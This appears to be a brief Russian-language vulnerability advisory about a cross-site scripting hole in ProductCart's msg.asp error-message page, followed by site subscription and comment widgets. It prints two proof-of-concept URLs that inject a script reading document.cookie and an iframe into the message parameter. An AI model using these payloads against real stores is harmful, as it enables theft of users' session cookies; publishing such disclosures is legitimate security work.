Есть возможность манипулирования сообщениями об ошибках в ProductCart
со вставкой тегов &lt;script&gt; и <iframe>.

http://www.website.com/ProductCart/pc/msg.asp?message =>&lt;script&gt;alert(document.cookie);&lt;/script&gt; 
http://www.website.com/ProductCart/pc/msg.asp?message =<iframe%20src="C:\"%20width=400%20height=400>
</iframe>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии